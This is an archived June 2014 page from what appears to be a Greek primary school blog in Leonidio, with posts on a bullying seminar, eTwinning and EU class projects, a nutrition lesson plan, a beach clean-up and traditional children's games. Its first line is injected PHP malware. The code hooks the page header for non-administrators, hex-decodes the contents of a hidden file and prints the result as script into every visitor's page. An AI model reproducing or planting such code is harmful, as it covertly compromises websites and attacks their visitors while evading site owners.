if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ιούνιος, 2014 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Ιούνιος 2014

“Σχολικός εκφοβισμός”- “Διαχείριση συγκρούσεων στην εποχή της κρίσης”

Στο πλαίσιο των επιμορφώσεων των εκπαιδευτικών της Γ Εκπαιδευτικής Περιφέρειας Αρκαδίας,η Σχολική Σύμβουλος κ Καρούτζου Γεωργία σε συνεργασία με την Ε.Ψ.Υ.Π.Ε. πραγματοποίησε για τους εκπαιδευτικούς επιμορφωτικό σεμινάριο με θέμα: «Διαχείριση συγκρούσεων στην εποχή της κρίσης»- “Σχολικός εκφοβισμός” στο χώρο του Δημοτικού Σχολείου Λεωνιδίου, την Παρασκευή 20 Ιουνίου 2014.
Οι Εκπαιδευτικοί των Σχολείων Δήμου Ν. Κυνουρίας ήρθαν σε επαφή με τους επιστημονικούς συνεργάτες της Ε.Ψ.Υ.Π.Ε κ. Β.Παπαγιαννοπούλου και κ. Κ. Δαφνά αντάλλαξαν εμπειρίες και απόψεις.
Αναφέρθηκε ότι ο εκφοβισμός και η επιθετικότητα στο χώρο του σχολείου αναδύεται ως σημαντικό πρόβλημα στη σημερινή εποχή και αποτελεί κοινωνικό φαινόμενο.
Εξετάστηκαν τα είδη του σχολικού εκφοβισμού καθώς και οι ρόλοι των παιδιών ως θυτών και θυμάτων. Ταυτόχρονα αναφερθηκαν οι μέθοδοι αντιμετώπισης και πρόληψης του φαινομένου και οι πρακτικές διαχείρισής του σε σχολικό αλλά και οικογενειακό επίπεδο.
? Είδη σχολικού εκφοβισμού
? Παιδιά θύτες και θύματα
? Επιπτώσεις στο παιδί
? Προληπτικές ενέργειες, στήριξη και αντιμετώπιση από γονείς και εκπαιδευτικούς.

“Music: The Common Language We Speak in Europe”

Ευαγγελία Μυλωνά
Αγγλικά ? ΣΤ? Δημοτικού 2013-2014

Κατά τη διάρκεια όλης της χρονιάς πραγματοποιήσαμε συνεργασία με το Γυμνάσιο του Cabrils στην Καταλονία της Ισπανίας (και για ένα σύντομο μόνο διάστημα με το Δημοτικό Σχολείο Catalca της Τουρκίας) στα πλαίσια του προγράμματος ηλεκτρονικής αδελφοποίησης σχολείων eTwinning. Χωρίσαμε το πρόγραμμα σε 4 θεματικές ενότητες (Tasks) και σε κάθε μια από αυτές οι μαθητές δούλεψαν ομαδοσυνεργατικά και κάνοντας χρήση ΤΠΕ για να πραγματοποιήσουν δραστηριότητες τις οποίες θα μοιράζονταν με τους συμμαθητές-συνεργάτες τους.
Κατά την πρώτη εισαγωγική θεματική, οι μαθητές και στις 2 χώρες άκουσαν και είδαν το τραγούδι/βίντεο “Ultimo Tango en Atenas” (http://www.youtube.com/watch?v=5h3P-WclRSo) ένα τραγούδι στα ισπανικά από ελληνικό συγκρότημα στο οποίο έχουν επιλεγεί ως στίχοι ισπανικές λέξεις που όλες έχουν ελληνική ρίζα. Ως δια μαγείας τα παιδιά και των 2 σχολείων ανακάλυψαν μια νέα μορφή επικοινωνίας: και οι μεν και οι δε αντιλαμβάνονται (σε κάποιο βαθμο) το νόημα του τραγουδιού χωρίς να γνωρίζουν τη γλώσσα των άλλων! Η μουσική λοιπόν όπως λέει και ο τίτλος του προγράμματος είναι μια γλώσσα που μας ενώνει και σχετίζεται με την παράδοση και την καθημερινότητά μας. Στην ίδια θεματική οι μαθητές αντάλλαξαν email όπου περιέγραφαν το σχολείο και τα μαθήματά τους αλλά και την πόλη τους ώστε να γνωριστούν. Τα email συνόδεψαν φωτογραφίες τις οποίες τράβηξαν μαθητές (το photo-shooting crew) στο σχολείο και τις γειτονιές τους ή κατέβασαν από το διαδίκτυο. Αμέσως μετά οι μαθητές διάλεξαν 3 τραγούδια στη γλώσσα τους με 3 διαφορετικά θέματα: αγάπη, φτώχεια και πολιτική (βλ. επιλογές ελληνικής ομάδας:
1.  http://www.youtube.com/watch?v=z7e3_OzysYE 
 “Πιο Ψηλά” –  VEGAS – Αγάπη
 
2. http://www.youtube.com/watch?v=uuQM5VxWR6c 
“Γυρίζω τις Πλάτες μου στο Μέλλον” ?Αφοί Κατσιμίχα – Πολιτική
 
3. http://www.youtube.com/watch?v=uYol57xgoGo 
“Βρέχει στη Φτωχογειτονιά” ? Γρ. Μπιθικώτσης – Φτώχεια)

 τα οποία αντάλλαξαν με τους συνεργάτες χωρίς να διευκρινίσουν ποιο τραγούδι αντιστοιχεί σε ποιο θέμα. Οι μαθητές έπρεπε να καταλάβουν την αντιστοιχία σύμφωνα με το άκουσμα της μουσικής.
Στη δεύτερη θεματική ασχοληθήκαμε με την παραδοσιακή μουσική και χορό αλλά και τα τοπικά έθιμα. Οι μαθητές έκαναν διαδικτυακή έρευνα πληροφοριών και φωτογραφιών και έγραψαν εργασίες για την παραδοσιακή μουσική και τα όργανα του τόπου, τους χορούς και τις αντάλλαξαν. Επίσης χόρεψαν και βιντεοσκόπησαν 3 ελληνικούς παραδοσιακούς χορούς στο σχολείο φορώντας παραδοσιακές στολές. Τα βίντεο των χορών βρίσκονται στους παρακάτω συνδέσμους:
1. Τσακώνικος https://www.youtube.com/watch?v=mmdztt6YH64&feature=youtu.be

2. Καλαματιανός https://www.youtube.com/watch?v=GNx8ynKoGgI&feature=youtu.be

3. Συρτός https://www.youtube.com/watch?v=T-fOy8jFIhg&feature=youtu.be

Επίσης, μετά από έρευνα έγραψαν εργασίες για 2 τοπικά έθιμα, το ιδιαίτερο Πάσχα στην Τσακωνιά και το φεστιβάλ της μελιτζάνας. Έφτιαξαν ένα αερόστατο και απαθανάτισαν τη διαδικασία για να τη δείξουν στους Ισπανούς (βλ. σύνδεσμο https://www.youtube.com/watch?v=ZGwzby05NFQ&feature=youtu.be)
Επίσης αντάλλαξαν παραδοσιακές συνταγές τοπικών γεύσεων. Τέλος στη θεματική αυτή, οι μαθητές βιντεοσκοπήθηκαν να μιλούν αγγλικά κάνοντας ο καθένας μια μικρή παρουσίαση του εαυτού του/της και αντάλλαξαν τα βίντεο ώστε να «σπάσει ο πάγος» με τους συνεργάτες!
Η τρίτη θεματική ήταν αφιερωμένη στην σύγχρονη μουσική που ακούν οι μαθητές αλλά και στην ξένη μουσική η οποία συνήθως είναι αγγλόφωνη από τις ΗΠΑ ή το Ηνωμένο Βασίλειο. Οι μαθητές έγραψαν εργασίες για τα αγαπημένα ελληνικά ή ξένα συγκροτήματα, τις συνόδεψαν με φωτογραφίες και βίντεο των αγαπημένων τους καλλιτεχνών και τραγουδιών και τις αντάλλαξαν με σκοπό να δουν αν υπάρχουν κοινά συγκροτήματα/τραγούδια που ακούν οι νέοι σε δυο διαφορετικές χώρες. Στην ίδια θεματική εντάχθηκε και η βιντεο-κλήση μέσω Skype η οποία κανονίστηκε ώστε τα παιδιά να έρθουν σε πιο άμεση επαφή με τους Ισπανούς συμμαθητές και να ρωτήσουν απευθείας τυχόν απορίες και ερωτήσεις.
Η τέταρτη θεματική αφορούσε στη δημιουργία ενός βίντεο-κλιπ το οποίο θα περιείχε στοιχεία ελληνικά, ισπανικά και αγγλικά. Ήταν η μεγάλη μας πρόκληση που όμως ευτυχώς πραγματοποιήθηκε με μεγάλη επιτυχία! Το κάθε σχολείο διάλεξε ένα τραγούδι της άλλης χώρας (από την πρώτη θεματική) και τράβηξε πλάνα στο σχολείο ή στην εκδρομή για να το επενδύσει. Σε ομάδες οι μαθητές έγραψαν στίχους στα αγγλικά στους οποίους περιέγραφαν τις εμπειρίες τους από τη συνεργασία eTwinning, τις νέες τους γνώσεις και τα συναισθήματά τους προς τους νέους τους φίλους! (βλ. σύνδεσμο για βίντεο https://www.youtube.com/watch?v=n0l2QCu3X3E )
Το ταξίδι μας στη μουσική, στην παράδοση και στις δυο χώρες έφτασε στο τέλος του. Το απολαύσαμε και γνωρίσαμε νέους τόπους και κουλτούρες, κάναμε νέους φίλους και φυσικά βελτιωθήκαμε στα αγγλικά! Αν θέλετε να δείτε και τις υπόλοιπες εργασίες, φωτογραφίες και βίντεο των μαθητών αλλά και τα αντίστοιχα των συνεργατών τους, επισκεφθείτε την πλατφόρμα twinspace ακολουθώντας τον σύνδεσμο:

http://new-twinspace.etwinning.net/web/p101191

“The Comic Book of Euro-Heroes: Saving Endangered Animals”

Ευαγγελία Μυλωνά
Αγγλικά ? Δ? Δημοτικού 2013-2014

Η υλοποίηση του εκπαιδευτικού project ?The Comic Book of Euro-heroes: Saving Endangered Animals? πραγματοποιήθηκε κατά το μάθημα των Αγγλικών στα πλαίσια της συμμετοχής της διδάσκουσας στην Ευρωπαϊκή εκπαιδευτική δράση Teachers 4 Europe 2014 της Αντιπροσωπείας της Ευρωπαϊκής Επιτροπής στην Ελλάδα. Συμμετείχαν οι μαθητές των Δ1 και Δ2 τμημάτων του Δημοτικού Σχολείου Λεωνιδίου. Μετά από εξερεύνηση πολλών θεμάτων που άπτονται των ενδιαφερόντων της Ευρωπαϊκής Ένωσης (πολιτισμός, περιβάλλον, νόμισμα, κράτη-μέλη, διαφορετικότητα, πολύ-πολιτισμικότητα) οι μαθητές κατέληξαν να ασχοληθούν με το περιβάλλον που κινδυνεύει, τα ζώα που ζουν στην Ευρώπη και πιο συγκεκριμένα με τα ζώα υπό εξαφάνιση και την Ευρωπαϊκή πολιτική προστασίας του περιβάλλοντος.
Μετά από έρευνα και συζήτηση, οι μαθητές ανακάλυψαν ότι υπάρχει ανάγκη για άμεση δράση στον τομέα του περιβάλλοντος και ως εκ τούτου διάλεξαν το project τους να ενημερώνει και να ευαισθητοποιεί όλους τους αποδέκτες του (μαθητές, εκπαιδευτικούς, γονείς κ.α.). Για να γίνει πιο άμεσο και ζωντανό αυτό το μήνυμα, οι μαθητές κατασκεύασαν με το λογισμικό ComicStripCreator μια σειρά από ψηφιακά comics με μικρές αυτοτελείς ιστορίες διάσωσης ζώων που βρίσκονται σε κίνδυνο στην Ευρώπη. Με κοινό παρανομαστή αυτών των ιστοριών τους δυο σούπερ Ευρω-ήρωες (το Γιούροκ και τη Γιουρούλ), οι μαθητές γνώρισαν τους κινδύνους που διατρέχουν αυτά τα ζώα της Ευρώπης, γνώρισαν νέες χώρες, ταξίδεψαν νοερά και ηλεκτρονικά στην Ευρωπαϊκή Ένωση, έμαθαν ότι το περιβάλλον δε γνωρίζει σύνορα κρατών και ως εκ τούτου χρειάζεται συνεργασία ανάμεσα στις χώρες και κοινή Ευρωπαϊκή πολιτική προστασίας. Επίσης εξασκήθηκαν στη χρήση νέων τεχνολογιών, αλλά κυρίως έμαθαν παίζοντας και διασκεδάζοντας!
Το ψηφιακά μας κόμιξ θα βρείτε σε μορφή flipbook στον παρακάτω σύνδεσμο:

http://d1-d2.flipsnackedu.com/browse/fxk96f3u

ΦΡΟΝΤΙΖΩ ΤΟΝ ΕΑΥΤΟ ΜΟΥ

ΤΑΞΗ : Α΄

ΣΧΟΛ. ΕΤΟΣ : 2013 – 2014

ΚΑΠΕΤΑΝΑΚΗ ΓΕΩΡΓΙΑ ΠΕ70

ΚΟΝΤΟΛΕΟΥ ΜΑΡΙΑ ΠΕ70

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

Γενικός σκοπός : Να συνειδητοποιήσουν οι μαθητές τον τρόπο και τη σημασία της φροντίδας της διατροφής τους, του σώματός τους και των δοντιών τους.

Ειδικοί στόχοι: 

  Α. Γνωρίζοντας και κατανοώντας

  • Να γνωρίσουν οι μαθητές ότι η τροφή δίνει την ενέργεια που χρειάζεται ο άνθρωπος για τις καθημερινές του δραστηριότητες.
  • Να γνωρίσουν ποιες τροφές είναι υγιεινές για τον ανθρώπινο οργανισμό και ποιες όχι.
  • Να κατανοήσουν τη σημασία της τροφικής πυραμίδας και τις ομάδες τροφίμων.
  • Να κατανοήσουν τη σημασία της σωματικής άσκησης.
  • Να κατανοήσουν σε γενικές γραμμές τη λειτουργία του πεπτικού συστήματος.
  • Να γνωρίσουν τα στοιχεία που παίρνουμε από διάφορες τροφές.
  • Γνωριμία με την παρασκευή του ψωμιού.
  • Να συνειδητοποιήσουν τη σημασία της περιποίησης των δοντιών μας.
  • Να γνωρίσουν μερικές ασθένειες των δοντιών μας.
  • Να μάθουν το σωστό τρόπο πλυσίματος των δοντιών.
  • Να γνωρίσουν τα μέρη του σώματός τους.
  • Να κατανοήσουν τη σημασία της περιποίησης του σώματός τους.

Β. Ερευνώντας και εντοπίζοντας

  • Να καταστούν οι μαθητές ικανοί να συντάξουν ημερολόγιο για την καθημερινή τους διατροφή και να συνειδητοποιήσουν αν είναι σωστές οι διατροφικές τους συνήθειες.
  • Να καταστούν οι μαθητές ικανοί να δημιουργήσουν ένα πρόγραμμα διατροφής για το δεκατιανό τους στο σχολείο.
  • Να έρθουν σε επαφή με την οδοντοστοιχία τους.
  • Να έρθουν σε επαφή με το χώρο του οδοντιατρείου, να διατυπώσουν τυχόν απορίες τους και να καταλήξουν σε συμπεράσματα.

Γ. Επικοινωνία και συνεργασία με άλλους

  • Επίσκεψη στο σούπερ μάρκετ, το φούρνο και το μανάβικο της γειτονιάς μας και παρατήρηση διάφορων προϊόντων.
  • Επίσκεψη στον οδοντίατρο (ή επίσκεψη του οδοντίατρου στο σχολείο).

Δ. Σύνδεση με τη ζωή

  • Να προσπαθήσουν να εντάξουν στην καθημερινή τους ζωή μία υγιεινότερη διατροφή.
  • Να γίνει στους μαθητές συνήθεια το πλύσιμο των δοντιών μετά από κάθε γεύμα και κυρίως μετά από κάθε γλύκισμα.

Εκτιμώμενη χρονική διάρκεια: 3 μήνες (Ιανουάριος- Φεβρουάριος – Μάρτιος)

Είδος διδακτικής πρακτικής   Ομαδοσυνεργατική , εποικοδομητική προσέγγιση, παιχνίδι ρόλων, μαιευτική, ιδεοθύελλα, συζήτηση, δερευνητική, χρήση ΤΠΕ.

Εκπαιδευτικό υλικό   Internet, χαρτί, χαρτόνι, εικόνες τροφίμων, παραμύθια, φρούτα.

Προαπαιτούμενη γνώση   Να έχουν οι μαθητές στο μυαλό τους ποικιλία τροφίμων.

Το επιστημονικό περιεχόμενο   Η σημασία της διατροφής και της περιποίησης των δοντιών και του σώματος για την υγειά του ανθρώπου.

Δραστηριότητα 1: Σε ένα φύλλο Α3 σχεδιάζουμε ένα ιδεόγραμμα το οποίο συμπληρώνουμε με τις ιδέες που θα διατυπώσουν οι μαθητές στην ερώτηση: «Όταν ακούτε τη φράση υγιεινή διατροφή, τι σας έρχεται στο μυαλό;».

Δ2: Παιχνίδι με καρτέλες. Οι καρτέλες περιέχουν εικόνες με δραστηριότητες και εικόνες με τρόφιμα (ευεργετικά ή μη για την υγεία του ανθρώπου). Οι μαθητές επιλέγουν δραστηριότητες κι έπειτα πρέπει να βρουν τη σωστή  τροφή που θα τους δώσει ενέργεια για να τις πραγματοποιήσουν. Στο τέλος συμπληρώνουμε το φύλλο εργασίας 1.

Δ3 : Οι μαθητές συμπληρώνουν ένα ημερολόγιο πρόγραμμα στο οποίο θα αναφέρουν τα φαγητά που θα καταναλώσουν στο χρονικό διάστημα μιας εβδομάδας. Στο τέλος της εβδομάδας παρουσιάζουν τα αποτελέσματα στους συμμαθητές τους και ακολουθεί συζήτηση σχετικά με τις διατροφικές τους συνήθειες.

Δ4: Τα παιδιά κατασκευάζουν τη δική τους διατροφική πυραμίδα εκφράζοντας ανεπηρέαστα την άποψή τους για το ποιες τροφές πρέπει να καταναλώνουμε περισσότερο και ποιες λιγότερο. Συμπληρώνουν το φύλλο εργασίας 4.

Δ5: Κατασκευή της διατροφικής πυραμίδας με χαρτόνι και διαχωρισμός των ομάδων τροφίμων. Οι μαθητές θα κολλήσουν πάνω στην πυραμίδα σαν κολάζ, εικόνες από διάφορα τρόφιμα ή εικόνες από έντυπο υλικό που θα φέρουν οι ίδιοι ξεχωρίζοντας τα τρόφιμα στις ομάδες τους. Στο πλάι της πυραμίδας θα ζωγραφίσουν εικόνες με δραστηριότητες για να συνδέσουμε την υγιεινή διατροφή με την άσκηση.

Δ6 :  Συμπληρωματική της δραστηριότητας 5. Τα παιδιά σε πλαστικό πιατάκι ή χαρτόνι προτείνουν «το πιάτο της ημέρας» με βάση μια ισορροπημένη διατροφή κολλώντας εικόνες ή ζωγραφίζοντας τις τροφές. Αποφασίζουμε από κοινού να προσαρμόσουμε το δεκατιανό μας στα πρότυπα της υγιεινής διατροφής.

Διαβάζουμε από το ανθολόγιο το κείμενο: «Μια φορά ήταν …… η κολοτούμπα» και κατασκευάζουμε το χέρι με τις ομάδες τροφίμων.

Δ7: Επίσκεψη διατροφολόγου στο σχολείο.

Δ7α : Ζωγραφίζουμε πάνω σε αληθινά φρούτα, λαχανικά, δημητριακά, όσπρια τους δίνουμε πρόσωπο και λαλιά, προσωποποιούμε ζώα από τα οποία παίρνουμε διάφορα προϊόντα και παίζουμε ένα μικρό θεατρικό δρώμενο παρουσιάζοντας τη θρεπτική αξία διάφορων τροφίμων. Παιχνίδι: Με κλειστά μάτια και την αίσθηση της αφής μαντεύω ποιο φρούτο ή λαχανικό είναι. Παιχνίδι: με κλειστά τα μάτια προσπαθούν οι μαθητές να μαντέψουν ποιο φρούτο ή λαχανικό κτλ είναι.

Δ8: Διαβάζουμε παραμύθια ? βιβλία, ακούμε τραγούδια σχετικά με το θέμα και διασκεδάζουμε.

  1. Από το στάρι στο ψωμί
  2. Το ξωτικό που ήθελε να ψηλώσει
  3. Ο κύριος Κιουκ έχει λόξιγκα
  4. Το φαγητό δεν είναι μόνο για να χορταίνουμε.
  5. Το χοντρό μπιζέλι
  6. Φρούτα φρουτ
  7. Τόσο λάθος διατροφή
  8. Μίλα μου για μήλα
  9. Το καρότο και η αγκινάρα

Δ9 : Σχεδιάζουμε το περίγραμμα ενός μαθητή σε χαρτί του μέτρου και κολλάμε πάνω τα όργανα του πεπτικού μας συστήματος τα οποία έχουμε εκτυπώσει σε χαρτί Α4 ή Α3, αφού πρώτα παρακολουθήσουμε το βίντεο: « Μια φορά ήταν η ζωή ? η πέψη» με τη βοήθεια του youtube. (http://www.youtube.com/watch?v=FiQ4M4ESuUU)

Τα δόντια

  Δ1: Με τη βοήθεια ενός καθρέφτη μετράμε και παρατηρούμε τα δόντια μας.

Δ2 : Παρακολουθούμε σχετικό βίντεο: « Μια φορά ήταν η ζωή ? τα δόντια» (http://www.youtube.com/watch?v=sAt1j_p824g) και συζητάμε ό,τι είδαμε.

Δ3: Παρακολουθούμε σχετικό βίντεο κινουμένων σχεδίων «Ο Ντάντλι επισκέπτεται τον οδοντίατρο»(youtube), και  «www.healthyteeth.org». Ακολουθεί συζήτηση και διεξαγωγή συμπερασμάτων.

Δ4: Επίσκεψη οδοντίατρου στο σχολικό χώρο.

Δ4 α: Μαθαίνω να πλένω σωστά τα δόντια μου.

Δ5: Διαβάζουμε σχετικά παραμύθια: «Η Δόνα Τερηδόνα» , «Ο Ιππόλυτος ο Ιπποπόταμος»

Καθαρό σώμα

Δ1 : Σε χαρτί του μέτρου σχεδιάζουμε το περίγραμμα ενός μαθητή και γράφουμε πάνω οδηγίες για το πώς πρέπει να διατηρούμε καθαρό το σώμα μας, τα βασικά όργανα του πεπτικού συστήματος και τα μέρη του σώματος.

Δ2 : Ακούμε τραγούδια για το σώμα μας. (Ζουζούνια ? Κεφάλι , ώμοι , γόνατα και δάχτυλα, Τραγουδάμε για το ένα, Χαρωπά τα δυο μου χέρια τα χτυπώ)

Αξιολόγηση: Κατά τη διάρκεια εκτέλεσης του διδακτικού σεναρίου οι μαθητές συμμετείχαν ενεργά. Πολλοί μαθητές υιοθέτησαν τον υγιεινό τρόπο διατροφής κάνοντας εφαρμογή στο καθημερινό δεκατιανό που έφερναν στο σχολείο.

Βιβλιογραφία:   Ανθολόγιο , «Μια φορά ήταν ……. η κολοτούμπα», σελ. 65 Ο κύριος Κιουκ έχει λόξιγκα, Μαρία Ρουσάκη Το φαγητό δεν είναι μόνο για να χορταίνουμε, Ελένη Χαρατσή ? Γιωτάκη Από το στάρι στο ψωμί, Ελένη Σβορώνου Το ξωτικό που ήθελε να ψηλώσει, Καλλιόπη Εμμανουηλίδου

Μεσόγειος SOS – εκπαιδευτικό πρόγραμμα

Οι μαθητές της ΣΤ΄ τάξης επισκέφθηκαν την περιοχή Πλάκα και συμμετείχαν, μαζί με όλο το σχολείο και τη συμμετοχή του Νηπιαγωγείου Λεωνιδίου, στον καθαρισμό της παραλίας. Παράλληλα ενημερώθηκαν από τους εκπαιδευτικούς του σχολείου, τους εκπροσώπους του “Φορέα Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού” καθώς και από τον εκπρόσωπο του Λιμενικού σταθμού για την ανάγκη προστασίας των ακτών της περιοχής μας που αποτελούν άλλωστε κληρονομιά όχι μόνο των κατοίκων της αλλά και ολόκληρου του πληθυσμού του πλανήτη Γη. Οι μαθητές κατανόησαν ότι πρέπει να προσπαθήσουμε όλοι μαζί, μικροί και μεγάλοι, να επαναδιαμορφώσουμε τη στάση μας και τη συμπεριφορά μας απέναντι στο φυσικό περιβάλλον.
Οι μαθητές της ΣΤ είχαν την ευκαιρία να συζητήσουν με έναν από τους παλαιότερους ψαράδες της περιοχής μας τον κ. Ρουσάλη Νίκο, για τον τρόπο ψαρέματος τα παλιά χρόνια, τις δυσκολίες στην ανοικτή θάλασσα, τις οικονομικές δυσκολίες του παρελθόντος, την αγάπη για το επάγγελμα και για τη θάλασσα, καθώς και για την ανάγκη γνώσης των καιρικών φαινομένων, αφού δεν υπήρχαν τις προηγούμενες εποχές τα κατάλληλα μέσα γνώσης εκ των προτέρων του καιρού και των καιρικών φαινομένων ανά ώρα ή ημέρα. Σημαντική η παρατήρηση του αγαπητού κ. Ρουσάλη για την κατακόρυφη αύξηση των ανθρώπων που ψαρεύουν και της αντίστοιχης μείωσης των αλιευμάτων για την περιοχή μας.
Η ημέρα τελείωσε με μια μικρή γιορτή που πραγματοποιήθηκε στην παραλία, όπου όλοι μαθητές και οι εκπαιδευτικοί ένωσαν το κέφι τους και διασκέδασαν μέχρι τη λήξη του εκπαιδευτικού ωραρίου.
Η σημερινή εκπαιδευτική σημαντική περιβαλλοντική δραστηριότητα έδειξε στους μαθητές μας ότι το μάθημα δεν πραγματοποιείται μόνο μέσα σε αίθουσες και τοίχους. Ένα εκπαιδευτικό θέμα έχει σημασία κι επιτυχία όταν καταφέρνουμε να φέρουμε τους μαθητές σε απευθείας επαφή με το γνωστικό αντικείμενο και να το παρατηρούν δια ζώσης και κυρίως να συζητούν με εκπροσώπους φορέων, επαγγελματίες και συμπολίτες μας.
Ένα σύγχρονο σχολείο, μια σύγχρονη εκπαίδευση διαδικασία αναδεικνύεται και εξελίσσεται όταν συνδυάζονται θεωρία με πράξη και σύνδεση του σχολείου με την τοπική κοινωνία. Το Δημοτικό σχολείο Λεωνιδίου έχει πάντα ανοικτή την πόρτα του στην τοπική κι ευρύτερη κοινωνία, ακολουθώντας πάντα συγκεκριμένους κανόνες και αρχές.
Ο δάσκαλος του ΣΤ1 Ηλίας Βλάχος.

ΤΑ ΠΑΙΧΝΙΔΙΑ ΑΛΛΟΤΕ ΚΑΙ ΣΗΜΕΡΑ

ΤΑ ΠΑΙΧΝΙΔΙΑ ΑΛΛΟΤΕ ΚΑΙ ΣΗΜΕΡΑ
Α΄ ΔΗΜΟΤΙΚΟΥ
ΕΚΠ/ΚΟΙ: ΚΟΝΤΟΛΕΟΥ ΜΑΡΙΑ ? ΚΑΠΕΤΑΝΑΚΗ ΓΕΩΡΓΙΑ
ΣΧΟΛΙΚΟ ΕΤΟΣ: 2013-2014

Η αγάπη των παιδιών για το παιχνίδι είναι διαχρονική και προέρχεται από την εσωτερική ανάγκη του παιδιού για δράση, κίνηση και ζωή. Μέσα από το παιχνίδι διαμορφώνεται ο χαρακτήρας του παιδιού, καθώς αυτό αντιλαμβάνεται σταδιακά την αναγκαιότητα πειθαρχίας στους κανόνες του κάθε παιχνιδιού, την ανάγκη συνεργασίας με τους συμπαίκτες και κατ? επέκταση τη μείωση του εγωκεντρισμού, την ανάγκη ανάπτυξης στρατηγικών για να οδηγηθεί στη νίκη αλλά και την αποδοχή της ήττας. Τα παραδοσιακά παιχνίδια δίνουν στο παιδί τη δυνατότητα να έρθει σε επαφή με την ύπαιθρο και το χώμα, να χρησιμοποιήσει απλά υλικά (πέτρες, ξυλάκια) και να αναπτύξει τη φαντασία του.

Μέσα από το παιχνίδι γίνεται:

  1. ? άσκηση της αντιληπτικής ικανότητας,
  2. ? της κινητικής ικανότητας,
  3. ? της μυϊκής δύναμης,
  4. ? καλλιέργεια της συνδυασμένης κίνησης ματιού και χεριού,
  5. ? της γρήγορης αντίδρασης,
  6. ? της αυτοσυγκέντρωσης, της προσοχής,
  7. ? της κινητικής ετοιμότητας,
  8. ? η ανάπτυξη ψυχικών αρετών (θάρρος, αυτοπεποίθηση, παρατηρητικότητα, πειθαρχία, υπομονή)

ΣΤΟΧΟΙ:

  • l Να γνωρίσουν και να παίξουν οι μαθητές παραδοσιακά παιχνίδια / επιτραπέζια / παιχνίδια γνώσεων.
  • l Να γνωρίσουν παιχνίδια της αρχαιότητας /των παππούδων τους
  • lΝα συνειδητοποιήσουν τη διαχρονική ανάγκη των παιδιών για παιχνίδι και την ανάγκη εφαρμογής κανόνων.
  • l Κατανόηση συναισθημάτων στη διάρκεια του παιχνιδιού.

Τα παιχνίδια που καταγράψαμε και παίξαμε είναι:
1. Κρυφτό
2. Τυφλόμυγα
3. Τσουβαλοδρομίες
4. Πατώ
5. Μπιζζ
6. Περνά ?περνά η μέλισσα
7. Πετάει ?πετάει
8. Πού είναι το δαχτυλίδι
9. Χαλασμένο τηλέφωνο
10. Αλάτι χοντρό ?αλάτι ψιλό
11. Ο βασιλιάς
12. Κλέφτες κι αστυνόμοι
13. Η κολοκυθιά
14. Η κρεμάλα
15. Το μαντιλάκι
16. Τα μήλα
17. Ο λύκος και τα αυγά
18. Αλλαγές
19. Αγαλματάκια

Κρυφτό
Παίζεται από δύο ή περισσότερα παιδιά σε χώρο με πολλές κρυψώνες πχ αυλή, κήπος κλπ.
Γίνεται κλήρωση (συχνά λέγοντας ένα τραγουδάκι όπως το α μπε μπα μπλομ?) για να βγει ο παίκτης που θα τα φυλάει, δηλαδή που θα μετρήσει μέχρι κάποιον αριθμό με κλειστά τα μάτια. Όση ώρα αυτός τα φυλάει, οι άλλοι παίκτες κρύβονται. Όταν τελειώσει το μέτρημα, αυτός που τα φυλάει προσπαθεί να βρει τους συμπαίκτες του. Μόλις βρει κάποιον τα φυλάει αυτός.

Τυφλόμυγα
Παίζεται από αρκετά παιδιά. Στην αρχή γίνεται κλήρωση για να δουν ποιος θα τα φυλάει. Αυτός κλείνει τα μάτια του με ένα μαντήλι και τα άλλα παιδιά ανακατεύονται αλλάζοντας θέσεις. Μετά η τυφλόμυγα προσπαθεί να πιάσει ένα παιδί και να βρει πώς το λένε. Αν το αναγνωρίσει, τότε αυτό το παιδί θα κάνει την τυφλόμυγα κι έτσι συνεχίζεται το παιχνίδι.

Τσουβαλοδρομίες
Οι παίκτες μπαίνουν μέσα σε τσουβάλια που τους φτάνουν μέχρι τη μέση περίπου και κάνουν αγώνα δρόμου. Νικητής είναι αυτός που θα φτάσει πρώτος στο τέρμα.

Το μπιζζζ!
Τα παιδιά αποφασίζουν ποιος θα τα φυλάει. Αυτός κλείνει τα μάτια του με το αριστερό του χέρι και το δεξί του χέρι το βάζει κάτω από την αριστερή του μασχάλη με την παλάμη ανοιχτή προς τα πάνω. Οι άλλοι παίκτες στέκονται πίσω του κι ένα παιδί τον χτυπά ελαφρά στην ανοιχτή παλάμη. Μετά αυτό το παιδί ανακατεύεται με τους υπόλοιπους παίκτες κι όλοι μαζί φωνάζουν «Μπιζζζ» κουνώντας το δεξί χέρι τους με υψωμένο το δείκτη. Αυτός που τα φυλάει πρέπει να μαντέψει ποιος τον χτύπησε. Αν τον ανακαλύψει παίρνει τη θέση του, αλλιώς τα ξαναφυλάει.

 

Περνά, περνά η μέλισσα
Δύο παιδιά χτυπούν παλαμάκια και τραγουδούν:
Περνά ? περνά η μέλισσα
με τα μελισσόπουλα
και με τα παιδόπουλα.
Τα άλλα παιδιά περνούν κάτω από τα χέρια τους. Όταν τελειώσουν το τραγούδι πιάνουν το παιδί που περνά εκείνη τη στιγμή και το βάζουν να επιλέξει με ποια ομάδα θα πάει. Στο τέλος οι δύο ομάδες τραβούν η μια την άλλη και όποια δεν πέσει κάτω είναι η νικήτρια.

Πετάει-Πετάει
Παίζεται με δύο παίκτες. Ο ένας παίκτης κουνάει τα δάχτυλά του πάνω κάτω και λέει «πετάει, πετάει?» προσθέτοντας το όνομα ενός ζώου ή πράγματος. Αν αυτό πετάει πρέπει να έχουν και οι δύο πάνω το δάχτυλό τους. Αν ο συμπαίκτης το έχει κάτω, χάνει και λέει αυτός το «πετάει, πετάει?»

 

Πού είναι το δαχτυλίδι

Κάποιο παιδί κρύβει ανάμεσα στα χέρια του ένα δαχτυλίδι, ενώ τα άλλα κάθονται σε σειρά. Κατόπιν προσπαθεί να αφήσει το δαχτυλίδι στα χέρια κάποιου άλλου παιδιού λέγοντας το τραγουδάκι:

Πουν’ το, πουν’ το
το δαχτυλίδι,
ψάξε, ψάξε
δεν θα το βρεις!
δεν θα το βρεις,
δεν θα το βρεις,
το δαχτυλίδι που ζητείς.
Τα παιδιά προσπαθούν να μαντέψουν ποιος έχει το δαχτυλίδι κάνοντας μόνο μία μαντεψιά. Αν κάποιος μαντέψει σωστά παίρνει αυτός το δαχτυλίδι και συνεχίζεται το παιχνίδι.

